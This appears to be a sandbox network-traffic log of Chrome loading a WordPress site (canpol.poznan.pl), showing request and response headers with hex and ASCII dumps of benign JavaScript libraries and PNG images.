                                                            2025-01-15 10:08:05 UTC8000INData Raw: 6e 75 6c 6c 2c 69 2c 30 2c 6e 29 29 2c 6e 26 26 69 26 26 21 69 2e 70 6c 75 67 69 6e 26 26 28 69 2e 70 6c 75 67 69 6e 3d 6e 29 3b 72 65 74 75 72 6e 20 69 7d 2c 68 2e 73 65 74 52 61 74 69 6f 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 69 2c 73 2c 72 3d 74 68 69 73 2e 5f 66 69 72 73 74 50 54 2c 6e 3d 31 65 2d 36 3b 69 66 28 31 21 3d 3d 74 7c 7c 74 68 69 73 2e 5f 74 77 65 65 6e 2e 5f 74 69 6d 65 21 3d 3d 74 68 69 73 2e 5f 74 77 65 65 6e 2e 5f 64 75 72 61 74 69 6f 6e 26 26 30 21 3d 3d 74 68 69 73 2e 5f 74 77 65 65 6e 2e 5f 74 69 6d 65 29 69 66 28 74 7c 7c 74 68 69 73 2e 5f 74 77 65 65 6e 2e 5f 74 69 6d 65 21 3d 3d 74 68 69 73 2e 5f 74 77 65 65 6e 2e 5f 64 75 72 61 74 69 6f 6e 26 26 30 21 3d 3d 74 68 69 73 2e 5f 74 77 65 65 6e 2e 5f 74 69 6d 65 7c
                                                            Data Ascii: null,i,0,n)),n&&i&&!i.plugin&&(i.plugin=n);return i},h.setRatio=function(t){var e,i,s,r=this._firstPT,n=1e-6;if(1!==t||this._tween._time!==this._tween._duration&&0!==this._tween._time)if(t||this._tween._time!==this._tween._duration&&0!==this._tween._time|


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            94192.168.2.1649811178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:04 UTC403OUTGET /wp-includes/js/wp-embed.min.js?ver=5.8 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:04 UTC284INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:04 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:13:44 GMT
                                                            ETag: "592-620a92c4059f2"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 1426
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:04 UTC1426INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 21 31 2c 6e 3d 21 31 3b 69 66 28 64 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 69 66 28 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 29 65 3d 21 30 3b 69 66 28 63 2e 77 70 3d 63 2e 77 70 7c 7c 7b 7d 2c 21 63 2e 77 70 2e 72 65 63 65 69 76 65 45 6d 62 65 64 4d 65 73 73 61 67 65 29 69 66 28 63 2e 77 70 2e 72 65 63 65 69 76 65 45 6d 62 65 64 4d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 64 61 74 61 3b 69 66 28 74 29 69 66 28 74 2e 73 65 63 72 65 74 7c 7c 74 2e 6d 65 73 73 61 67 65 7c 7c 74 2e 76 61 6c 75 65
                                                            Data Ascii: /*! This file is auto-generated */!function(c,d){"use strict";var e=!1,n=!1;if(d.querySelector)if(c.addEventListener)e=!0;if(c.wp=c.wp||{},!c.wp.receiveEmbedMessage)if(c.wp.receiveEmbedMessage=function(e){var t=e.data;if(t)if(t.secret||t.message||t.value


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            95192.168.2.1649812178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:04 UTC644OUTGET /wp-content/uploads/2015/07/StarWars.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:04 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:04 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:25 GMT
                                                            ETag: "2b83-620a8b51819a8"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 11139
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:04 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 50 00 00 01 00 08 06 00 00 00 7c 84 48 2f 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 0a 4f 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 67 54 53 e9 16 3d f7 de f4 42 4b 88 80 94 4b 6f 52 15 08 20 52 42 8b 80 14 91 26 2a 21 09 10 4a 88 21 a1 d9 15 51 c1 11 45 45 04 1b c8 a0 88 03 8e 8e 80 8c 15 51 2c 0c 8a 0a d8 07 e4 21 a2 8e 83 a3 88 8a ca fb e1 7b a3 6b d6 bc f7 e6 cd fe b5 d7 3e e7 ac f3 9d b3 cf 07 c0 08 0c 96 48 33 51 35 80 0c a9 42 1e 11 e0 83 c7 c4 c6 e1 e4 2e 40 81 0a 24 70 00 10 08 b3 64 21 73 fd 23 01 00 f8 7e 3c 3c 2b 22 c0 07 be 00 01 78 d3 0b 08 00 c0 4d 9b c0 30 1c 87 ff 0f ea 42 99 5c 01 80 84 01 c0 74 91 38 4b
                                                            Data Ascii: PNGIHDRP|H/pHYs.#.#x?vOiCCPPhotoshop ICC profilexSgTS=BKKoR RB&*!J!QEEQ,!{k>H3Q5B.@$pd!s#~<<+"xM0B\t8K
                                                            2025-01-15 10:08:04 UTC3204INData Raw: da 61 65 4c f1 a0 b0 d3 7a 2f ec b1 4c 0e 6b 87 d6 98 82 40 fc a4 93 71 93 7d 92 b2 3c e5 a1 85 58 38 da e3 77 ee a8 07 10 c3 88 27 c0 e5 c1 8d e2 78 b4 cf fe 57 13 0d c5 39 69 69 50 35 10 09 d9 66 25 fc 9e b3 3c b9 bc 8f 40 b5 02 10 8f 30 f8 44 f3 fe a7 6f 6e d4 bf 16 7d 53 e9 0b ee 09 83 d4 05 2a c0 80 2f 26 6a 63 8a ec b6 f7 1c ed 51 08 d6 92 c6 e5 c2 a0 9b 10 d9 c7 6b a5 b1 78 7e 17 60 a7 f0 3b 34 14 69 c8 80 94 25 ea 3c 37 89 3a da f3 f7 5a ea 01 cc 8c 6f 49 d0 dc 81 3f af 8f 1a 97 d9 49 67 90 26 35 21 08 da 6e 21 51 0a 05 8a 7d 50 30 ab 30 04 c8 5e ad 7e f9 ee 07 6e a9 60 ad ec 3b 70 b9 70 62 18 53 68 1c 94 ac a6 ac ab 09 4b d4 35 02 f5 0a ae 81 ee 05 60 1e 42 e4 23 d3 3c 52 6e 13 19 e9 36 14 ed a4 50 77 e2 6c 82 6b 85 ba 4c de fd 47 63 8a 73 04 6a
                                                            Data Ascii: aeLz/Lk@q}<X8w'xW9iiP5f%<@0Don}S*/&jcQkx~`;4i%<7:ZoI?Ig&5!n!Q}P00^~n`;ppbShK5`B#<Rn6PwlkLGcsj


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            96192.168.2.1649813178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:04 UTC454OUTGET /wp-content/plugins/js_composer_salient/assets/js/dist/js_composer_front.min.js?ver=4.12.1 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:05 UTC286INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:04 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:57:50 GMT
                                                            ETag: "6af9-620a8f3691421"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 27385
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:05 UTC7906INData Raw: 66 75 6e 63 74 69 6f 6e 20 76 63 5f 6a 73 28 29 20 7b 0a 20 20 20 20 76 63 5f 74 6f 67 67 6c 65 42 65 68 61 76 69 6f 75 72 28 29 2c 20 0a 20 20 20 20 76 63 5f 74 61 62 73 42 65 68 61 76 69 6f 75 72 28 29 2c 20 0a 20 20 20 20 76 63 5f 61 63 63 6f 72 64 69 6f 6e 42 65 68 61 76 69 6f 75 72 28 29 2c 20 0a 20 20 20 20 76 63 5f 74 65 61 73 65 72 47 72 69 64 28 29 2c 20 0a 20 20 20 20 76 63 5f 63 61 72 6f 75 73 65 6c 42 65 68 61 76 69 6f 75 72 28 29 2c 20 0a 20 20 20 20 76 63 5f 73 6c 69 64 65 72 73 42 65 68 61 76 69 6f 75 72 28 29 2c 20 0a 20 20 20 20 76 63 5f 70 72 65 74 74 79 50 68 6f 74 6f 28 29 2c 20 0a 20 20 20 20 76 63 5f 67 6f 6f 67 6c 65 70 6c 75 73 28 29 2c 20 0a 20 20 20 20 76 63 5f 70 69 6e 74 65 72 65 73 74 28 29 2c 20 0a 20 20 20 20 76 63 5f 70 72
                                                            Data Ascii: function vc_js() { vc_toggleBehaviour(), vc_tabsBehaviour(), vc_accordionBehaviour(), vc_teaserGrid(), vc_carouselBehaviour(), vc_slidersBehaviour(), vc_prettyPhoto(), vc_googleplus(), vc_pinterest(), vc_pr
                                                            2025-01-15 10:08:05 UTC8000INData Raw: 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 70 6f 2c 20 73 29 0a 20 20 20 20 20 20 20 20 7d 28 29 0a 20 20 20 20 7d 29 2c 20 22 66 75 6e 63 74 69 6f 6e 22 20 21 3d 20 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 76 63 5f 70 72 6f 67 72 65 73 73 5f 62 61 72 20 26 26 20 28 77 69 6e 64 6f 77 2e 76 63 5f 70 72 6f 67 72 65 73 73 5f 62 61 72 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 22 75 6e 64 65 66 69 6e 65 64 22 20 21 3d 20 74 79 70 65 6f 66 20 6a 51 75 65 72 79 2e 66 6e 2e 77 61 79 70 6f 69 6e 74 20 26 26 20 6a 51 75 65 72 79 28 22 2e 76 63 5f 70 72 6f 67 72 65 73 73 5f 62 61 72 22 29 2e 77 61 79 70 6f 69 6e 74 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6a 51
                                                            Data Ascii: s.parentNode.insertBefore(po, s) }() }), "function" != typeof window.vc_progress_bar && (window.vc_progress_bar = function() { "undefined" != typeof jQuery.fn.waypoint && jQuery(".vc_progress_bar").waypoint(function() { jQ
                                                            2025-01-15 10:08:05 UTC8000INData Raw: 20 20 20 20 20 20 20 73 63 72 65 65 6e 5f 73 69 7a 65 20 3d 20 67 65 74 53 69 7a 65 4e 61 6d 65 28 29 2c 20 62 65 66 6f 72 65 5f 72 65 73 69 7a 65 20 21 3d 20 73 63 72 65 65 6e 5f 73 69 7a 65 20 26 26 20 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 22 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 22 2c 20 32 30 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 29 0a 20 20 20 20 7d 29 2c 20 22 66 75 6e 63 74 69 6f 6e 22 20 21 3d 20 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 76 63 5f 73 6c 69 64 65 72 73 42 65 68 61 76 69 6f 75 72 20 26 26 20 28 77 69 6e 64 6f 77 2e 76 63 5f 73 6c 69 64 65 72 73 42 65 68 61 76 69 6f 75 72 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20
                                                            Data Ascii: screen_size = getSizeName(), before_resize != screen_size && window.setTimeout("location.reload()", 20) }) } }) }), "function" != typeof window.vc_slidersBehaviour && (window.vc_slidersBehaviour = function()
                                                            2025-01-15 10:08:05 UTC3479INData Raw: 76 63 5f 70 6c 75 67 69 6e 5f 66 6c 65 78 73 6c 69 64 65 72 28 70 61 6e 65 6c 29 2c 20 75 69 2e 6e 65 77 50 61 6e 65 6c 2e 66 69 6e 64 28 22 2e 76 63 5f 6d 61 73 6f 6e 72 79 5f 6d 65 64 69 61 5f 67 72 69 64 2c 20 2e 76 63 5f 6d 61 73 6f 6e 72 79 5f 67 72 69 64 22 29 2e 6c 65 6e 67 74 68 20 26 26 20 75 69 2e 6e 65 77 50 61 6e 65 6c 2e 66 69 6e 64 28 22 2e 76 63 5f 6d 61 73 6f 6e 72 79 5f 6d 65 64 69 61 5f 67 72 69 64 2c 20 2e 76 63 5f 6d 61 73 6f 6e 72 79 5f 67 72 69 64 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 67 72 69 64 20 3d 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 22 76 63 47 72 69 64 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 67 72 69 64 20 26 26 20 67 72 69 64
                                                            Data Ascii: vc_plugin_flexslider(panel), ui.newPanel.find(".vc_masonry_media_grid, .vc_masonry_grid").length && ui.newPanel.find(".vc_masonry_media_grid, .vc_masonry_grid").each(function() { var grid = jQuery(this).data("vcGrid"); grid && grid


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            97192.168.2.1649814178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:05 UTC654OUTGET /wp-content/uploads/2015/07/disney_zootropolis.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:05 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:05 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:20 GMT
                                                            ETag: "32f3-620a8b4d18b8a"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 13043
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:05 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 00 72 7c 88 ab 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 07 74 49 4d 45 07 e1 02 1c 15 36 22 37 52 68 ca 00 00 20 00 49 44 41 54 78 da ed bd 67 94 1d d7 75 a0 fb 9d 8a 37 df ce 68 34 80 6e 44 02 44 60 84 18 c5 24 89 a4 48 4a d4 48 94 34 b2 2d 5b c9 e3 e5 79 23 87 b1 ac 99 e5 37 b6 9e c3 bc e4 d1 8c 9f e3 f2 b3 f5 46 96 64 45 cb 4a b6 44 51 14 49 31 8b 01 00 29 90 40 23 b1 23 1a e8 dc 7d f3 ad 70 ce fb 71 6f 83 00 85 d0 88 4c fb 5b eb 02 bd ba 6f a8 da b7 ea ab bd 4f ed 3a 05 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08
                                                            Data Ascii: PNGIHDR,r|bKGDpHYs.#.#x?vtIME6"7Rh IDATxgu7h4nDD`$HJH4-[y#7FdEJDQI1)@##}pqoL[oO:
                                                            2025-01-15 10:08:05 UTC5108INData Raw: 58 f9 44 a6 91 49 35 ce 7a b9 38 26 83 1b b4 a0 a3 18 15 25 71 51 2c f3 53 fc ed af fc 1e bf f3 a5 bf a1 54 2f 91 b9 ac 95 7a 47 85 2f 1f fc 0e e1 d2 0a ef b0 ae a2 95 04 ef dc 74 39 81 4e f2 97 df f9 1c ad 6f 5d 82 6e 81 38 69 b1 30 63 8c 5b d0 64 ea 36 e1 ae 2a ad c3 29 fe 8f 5f fe 14 ed b8 84 68 8c 72 50 2a 49 84 dd 6c de ac b3 2c dd 49 6f 32 0d d9 a5 0b 0d e8 60 2d cc b4 d0 b0 bf 67 e0 77 6f fd 00 e1 f7 2d 7e f2 c0 33 74 5c b2 94 5a 3a 40 79 36 d8 0a 27 30 24 0a 1a af 6c 33 bf 63 8e 77 a5 df ce a7 6e bf 1b 6d 0c be f2 c9 97 bb 69 0f 15 25 3f 00 13 33 a9 23 50 1a 15 59 14 c6 27 b9 be e7 26 66 47 66 99 bc 77 1a b7 d5 63 ba 0e 5d f7 74 13 6f b7 e8 dc ba 8c f9 7c 81 03 c5 01 f6 74 f7 d3 a2 b6 e0 93 a6 d6 9c 35 75 82 49 1e aa 3c c3 ae fa 28 4e b2 95 c4 64
                                                            Data Ascii: XDI5z8&%qQ,ST/zG/t9No]n8i0c[d6*)_hrP*Il,Io2`-gwo-~3t\Z:@y6'0$l3cwnmi%?3#PY'&fGfwc]to|t5uI<(Nd


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            98192.168.2.1649815178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:05 UTC428OUTGET /wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=5.8 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:05 UTC284INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:05 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:15:03 GMT
                                                            ETag: "4a9-620a930fda4db"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 1193
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:05 UTC1193INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 6f 69 64 20 30 3d 3d 3d 6d 65 6a 73 2e 70 6c 75 67 69 6e 73 26 26 28 6d 65 6a 73 2e 70 6c 75 67 69 6e 73 3d 7b 7d 2c 6d 65 6a 73 2e 70 6c 75 67 69 6e 73 2e 73 69 6c 76 65 72 6c 69 67 68 74 3d 5b 5d 2c 6d 65 6a 73 2e 70 6c 75 67 69 6e 73 2e 73 69 6c 76 65 72 6c 69 67 68 74 2e 70 75 73 68 28 7b 74 79 70 65 73 3a 5b 5d 7d 29 29 2c 6d 65 6a 73 2e 48 74 6d 6c 4d 65 64 69 61 45 6c 65 6d 65 6e 74 53 68 69 6d 3d 6d 65 6a 73 2e 48 74 6d 6c 4d 65 64 69 61 45 6c 65 6d 65 6e 74 53 68 69 6d 7c 7c 7b 67 65 74 54 79 70 65 46 72 6f 6d 46 69 6c 65 3a 6d 65 6a 73 2e 55 74 69 6c 73 2e 67 65 74 54 79 70 65 46 72 6f 6d 46 69 6c 65 7d 2c 76 6f 69 64 20 30 3d 3d 3d 6d 65 6a 73 2e 4d 65 64 69 61 46 65 61 74 75 72 65 73 26 26 28 6d 65 6a
                                                            Data Ascii: !function(a){void 0===mejs.plugins&&(mejs.plugins={},mejs.plugins.silverlight=[],mejs.plugins.silverlight.push({types:[]})),mejs.HtmlMediaElementShim=mejs.HtmlMediaElementShim||{getTypeFromFile:mejs.Utils.getTypeFromFile},void 0===mejs.MediaFeatures&&(mej


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            99192.168.2.1649816178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:05 UTC658OUTGET /wp-content/uploads/2015/07/disney_winnie_the_pooh.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:05 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:05 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:14 GMT
                                                            ETag: "7825-620a8b4732fcc"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 30757
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:05 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 00 72 7c 88 ab 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 07 74 49 4d 45 07 e1 02 1c 15 37 3a 3d 25 c1 dd 00 00 20 00 49 44 41 54 78 da ec bd d7 8f 64 57 9e e7 f7 39 e7 5c 1b de a4 77 e5 59 64 91 6c 76 d3 75 f7 76 ef 18 0d b0 1a ec c3 00 02 f4 24 08 d0 93 80 79 10 a4 17 ad f4 26 ec ea 3f 90 03 04 e8 49 80 a0 07 99 87 85 a0 c1 4a b3 9a dd 31 cd e1 d0 b3 c9 f2 2e 33 2b 7d 46 46 86 8f b8 ee 1c 3d dc a8 ac 64 b1 8a ec 66 d3 56 9f 4f 31 58 26 22 6e dc 3c 79 ef 37 7f bf df f9 19 b0 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b
                                                            Data Ascii: PNGIHDR,r|bKGDpHYs.#.#x?vtIME7:=% IDATxdW9\wYdlvuv$y&?IJ1.3+}FF=dfVO1X&"n<y7X,bX,bX,bX,bX,bX,
                                                            2025-01-15 10:08:05 UTC8000INData Raw: 23 55 1e b3 cf b2 dc e2 99 5a 1b 52 49 a4 90 79 66 86 d6 e8 69 5a 46 be d3 e8 a0 1e a6 51 4c 83 e6 d9 49 5a c7 54 fe 8d 41 6b 73 12 27 54 6a 9a 07 36 4d ae cd b4 66 38 ec 93 a5 09 95 5a 0d d7 c9 07 53 f4 0f 0f b8 f6 fe 7b dc bb fa 09 93 a3 43 92 41 46 df ec 70 ff ea a7 54 17 96 b9 30 b7 4a b9 b9 84 ef e5 9f 3f 18 0c f1 5c 37 ef c8 e1 7e c9 ad 21 7e 13 cb f0 8b f9 6c 6a 88 c5 0a d6 b7 67 67 a1 b5 21 4d 53 3c 9d e7 0d 54 67 e6 79 f9 cd 7f c4 d9 85 25 8e ce 5d e0 e8 e6 4d 8e 6e de e2 e8 fa 6d a2 9d 03 7c 2d f0 91 08 43 1e 6b 51 0e 17 ce 9e e5 67 7f f8 07 38 2f 3e 0f b5 1a 73 b5 26 73 73 cb 2c 2c 9f 63 73 e6 63 d6 c5 db 0c d6 37 51 a3 09 5e 92 e1 21 11 3a 43 4b 87 95 b9 05 ce 5d 79 91 b5 9f fd 0c e7 85 97 20 ac c0 49 a2 2a 80 24 a8 d4 08 2e 5c 62 ae 52 e5 b9
                                                            Data Ascii: #UZRIyfiZFQLIZTAks'Tj6Mf8ZS{CAFpT0J?\7~!~ljgg!MS<Tgy%]Mnm|-CkQg8/>s&ss,,csc7Q^!:CK]y I*$.\bR
                                                            2025-01-15 10:08:05 UTC8000INData Raw: b2 98 5d 5b c5 5a 5a 85 ea 6c 3a b6 f2 02 88 ea 8b 3e d2 ce 07 ef f3 d1 df fd 2d fb ef bf 4f ef e9 33 cc 41 88 4a c0 8f 35 5b cf 9e d2 f9 77 ff 8e 1b 6f bf c1 9d d7 5e 63 71 6d 85 9b 6f bd 81 ab 4c 6a a5 32 85 9c 47 14 c7 ec 9c 1c 21 2b 65 ae be fd 16 ab 37 ae 21 4c 93 61 e0 d3 09 c6 f4 03 9f 38 48 0d 5b 0f 76 76 f8 9b ff f3 df b2 fa d2 2d 5e f9 c1 f7 b8 fa 8d d7 28 6f 5c 41 c5 02 17 13 45 ca 01 3b 1b f7 31 72 2e d7 6e 5e 63 71 6d 05 72 36 e3 24 a0 17 87 74 a2 04 3f 04 1d 41 f3 a0 c1 93 bf f9 6b ea b7 ae f1 9d 1f fe 88 57 de 7e 93 a5 e5 55 88 34 8e e5 60 49 45 12 c7 1c 9e 9e 12 28 c5 b5 37 df 60 f5 f6 2d 8c 85 59 72 5a 71 fd 7b df 22 91 09 5b f7 1f 90 c4 60 0d 87 3c 7a f7 3d 4e 77 0f 98 bb 71 8d 62 bd 8e e1 ba 44 71 4c bf d7 65 f7 e8 90 9d 93 63 8c 99 19
                                                            Data Ascii: ][ZZl:>-O3AJ5[wo^cqmoLj2G!+e7!La8H[vv-^(o\AE;1r.n^cqmr6$t?AkW~U4`IE(7`-YrZq{"[`<z=NwqbDqLec
